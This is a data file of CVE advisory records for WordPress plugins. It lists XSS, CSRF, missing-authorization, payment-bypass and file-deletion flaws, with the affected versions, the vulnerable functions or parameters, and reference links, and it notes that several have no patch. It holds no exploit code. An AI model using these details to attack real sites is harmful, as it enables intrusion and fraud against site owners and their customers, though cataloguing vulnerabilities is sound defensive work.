{"CVE_ID":"CVE-2025-32597","slug":"connect-daily-web-calendar","versionImpact":"1.5.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in George Sexton WordPress Events Calendar Plugin \u2013 connectDaily allows Cross-Site Scripting (XSS). This issue affects WordPress Events Calendar Plugin \u2013 connectDaily: from n\/a through 1.4.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/connect-daily-web-calendar\\\/vulnerability\\\/wordpress-wordpress-events-calendar-plugin-connectdaily-plugin-1-4-8-csrf-to-cross-site-scripting-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/connect-daily-web-calendar\\\/vulnerability\\\/wordpress-wordpress-events-calendar-plugin-connectdaily-plugin-1-4-8-csrf-to-cross-site-scripting-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6257","slug":"euro-fxref-currency-converter","versionImpact":"2.0.2","description":"The Euro FxRef Currency Converter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's currency shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/joostdekeijzer\\\/wp_eurofxref\\\/commit\\\/131108428f0d88dab1070048350bdd54f10c36a0\",\"name\":\"https:\\\/\\\/github.com\\\/joostdekeijzer\\\/wp_eurofxref\\\/commit\\\/131108428f0d88dab1070048350bdd54f10c36a0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314562\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314562\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/euro-fxref-currency-converter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/euro-fxref-currency-converter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7637e96-3afe-46af-b99d-70abe9ca3e20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7637e96-3afe-46af-b99d-70abe9ca3e20?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5753","slug":"commercial-real-estate-valuation-calculator","versionImpact":"1.3.2","description":"The Valuation Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/commercial-real-estate-valuation-calculator\\\/trunk\\\/valuation-calculator.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/commercial-real-estate-valuation-calculator\\\/trunk\\\/valuation-calculator.php#L386\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/commercial-real-estate-valuation-calculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/commercial-real-estate-valuation-calculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14f2ed-6ae8-409e-86fc-c305a56f5d5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14f2ed-6ae8-409e-86fc-c305a56f5d5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47163","slug":"wp-csv-to-database","versionImpact":"2.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Tips and Tricks HQ, josh401 WP CSV to Database \u2013 Insert CSV file content into WordPress plugin <= 2.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-csv-to-database\\\/wordpress-wp-csv-to-database-plugin-2-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-csv-to-database\\\/wordpress-wp-csv-to-database-plugin-2-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2526","slug":"google-maps-easy","versionImpact":"1.11.7","description":"The Easy Google Maps plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.11.7. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to executes AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?rev=2777743#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?rev=2777743#L246\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea4ca00-185b-4f5d-9c5c-f81ba4edad05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea4ca00-185b-4f5d-9c5c-f81ba4edad05?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4425","slug":"defender-security","versionImpact":"2.4.6","description":"The Defender Security plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.6. This is due to missing or incorrect nonce validation on the verify_otp_login_time() function. This makes it possible for unauthenticated attackers to verify a one time login via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e772fbbe-33d5-46fa-a041-ab07d3f9318f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e772fbbe-33d5-46fa-a041-ab07d3f9318f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473684%40defender-security&new=2473684%40defender-security&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473684%40defender-security&new=2473684%40defender-security&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4774","slug":"wp-piwik","versionImpact":"1.0.28","description":"The WP-Matomo Integration (WP-Piwik) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp-piwik' shortcode in versions up to, and including, 1.0.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969705\\\/wp-piwik#file164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969705\\\/wp-piwik#file164\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-piwik\\\/tags\\\/1.0.28\\\/classes\\\/WP_Piwik\\\/Widget\\\/OptOut.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-piwik\\\/tags\\\/1.0.28\\\/classes\\\/WP_Piwik\\\/Widget\\\/OptOut.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4f041-4740-4ebb-afb3-10019ce571be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4f041-4740-4ebb-afb3-10019ce571be?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5243","slug":"login-screen-manager","versionImpact":"3.5.2","description":"The Login Screen Manager WordPress plugin through 3.5.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad895200-a03a-4e92-b256-d6991547d38a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad895200-a03a-4e92-b256-d6991547d38a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1618","slug":"coru-lfmember","versionImpact":"1.0.2","description":"The Coru LFMember WordPress plugin through 1.0.2 does not have CSRF check in place when adding a new game, and is lacking sanitisation as well as escaping in their settings, allowing attacker to make a logged in admin add an arbitrary game with XSS payloads","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddafcab2-b5db-4839-8ae1-188383f4250d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddafcab2-b5db-4839-8ae1-188383f4250d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1686","slug":"woo-thank-you-page-customizer","versionImpact":"1.1.2","description":"The Thank You Page Customizer for WooCommerce \u2013 Increase Your Sales plugin for WordPress is vulnerable to missing authorization e in all versions up to, and including, 1.1.2 via the apply_layout function due to a missing capability check. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve arbitrary order data which may contain PII.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041096\\\/woo-thank-you-page-customizer\\\/trunk\\\/frontend\\\/frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041096\\\/woo-thank-you-page-customizer\\\/trunk\\\/frontend\\\/frontend.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2382","slug":"authorizenet-payment-gateway-for-woocommerce","versionImpact":"8.0","description":"The Authorize.net Payment Gateway For WooCommerce plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 8.0. This is due to the plugin not properly verifying the authenticity of the request that updates a orders payment status. This makes it possible for unauthenticated attackers to update order payment statuses to paid bypassing any payment.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ab71d24-0409-421b-8abf-f4d5390a32a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ab71d24-0409-421b-8abf-f4d5390a32a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authorizenet-payment-gateway-for-woocommerce\\\/trunk\\\/index.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authorizenet-payment-gateway-for-woocommerce\\\/trunk\\\/index.php#L205\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6625","slug":"wp-total-branding","versionImpact":"1.2","description":"The WP Total Branding \u2013 Complete branding solution for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b6ac92f-2ad1-4528-b157-5e49d6f224a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b6ac92f-2ad1-4528-b157-5e49d6f224a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/options\\\/login.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/options\\\/login.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-total-branding\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-total-branding\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7381","slug":"cf-geoplugin","versionImpact":"8.6.9","description":"The Geo Controller plugin for WordPress is vulnerable to unauthorized shortcode execution due to missing authorization and capability checks on the ajax__shortcode_cache function in all versions up to, and including, 8.6.9. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed7b13a-eec3-4035-8815-15228fb05af1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed7b13a-eec3-4035-8815-15228fb05af1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Shortcodes.php#L1932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Shortcodes.php#L1932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9937","slug":"woo-manage-fraud-orders","versionImpact":"6.1.7","description":"The Woo Manage Fraud Orders plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 6.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc8b0944-f669-40d3-899b-d7f91b1a1fea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc8b0944-f669-40d3-899b-d7f91b1a1fea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-logs-table.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-logs-table.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-fraud-attempts-table.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-fraud-attempts-table.php#L108\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10588","slug":"debug-tool","versionImpact":"2.2","description":"The Debug Tool plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the info() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to obtain information from phpinfo(). When WP_DEBUG is enabled, this can be exploited by unauthenticated users as well.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b01991c-de16-43c4-bb11-c8730230ce51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b01991c-de16-43c4-bb11-c8730230ce51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/phpinfo.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/phpinfo.php#L43\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9223","slug":"wpdash-notes","versionImpact":"1.3.5","description":"The WPDash Notes plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wp_ajax_post_it_list_comment' function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view comments on any post, including private and password protected posts, and pending and draft posts if they were previously published. The vulnerability was partially patched in version 1.3.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdash-notes\\\/trunk\\\/classes\\\/plugin.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdash-notes\\\/trunk\\\/classes\\\/plugin.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58f048e5-f4be-4452-8fed-16871f4020b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58f048e5-f4be-4452-8fed-16871f4020b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10182","slug":"cognito-forms","versionImpact":"2.0.6","description":"The Cognito Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L193\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L193\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cognito-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cognito-forms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b1d728-b5aa-4811-b92a-9ce36abc2b80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b1d728-b5aa-4811-b92a-9ce36abc2b80?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12714","slug":"backlink-monitoring-manager","versionImpact":"0.1.3","description":"The Backlink Monitoring Manager WordPress plugin through 0.1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7fb2aef-16ce-4ae7-927c-2ffbc45fbda5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7fb2aef-16ce-4ae7-927c-2ffbc45fbda5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13707","slug":"wp-image-uploader","versionImpact":"1.0.1","description":"The WP Image Uploader plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the gky_image_uploader_main_function() function. This makes it possible for unauthenticated attackers to delete arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646a9885-8e0e-42a9-a113-0688c9f6dc93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646a9885-8e0e-42a9-a113-0688c9f6dc93?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32581","slug":"cf7-manual-spam-blocker","versionImpact":"2.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ankit Singla WordPress Spam Blocker allows Stored XSS. This issue affects WordPress Spam Blocker: from n\/a through 2.0.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cf7-manual-spam-blocker\\\/vulnerability\\\/wordpress-wordpress-spam-blocker-plugin-2-0-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cf7-manual-spam-blocker\\\/vulnerability\\\/wordpress-wordpress-spam-blocker-plugin-2-0-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25708","slug":"wpvr","versionImpact":"8.2.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in Rextheme WP VR \u2013 360 Panorama and Virtual Tour Builder For WordPress plugin <= 8.2.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpvr\\\/wordpress-wp-vr-360-panorama-and-virtual-tour-builder-plugin-8-2-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpvr\\\/wordpress-wp-vr-360-panorama-and-virtual-tour-builder-plugin-8-2-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
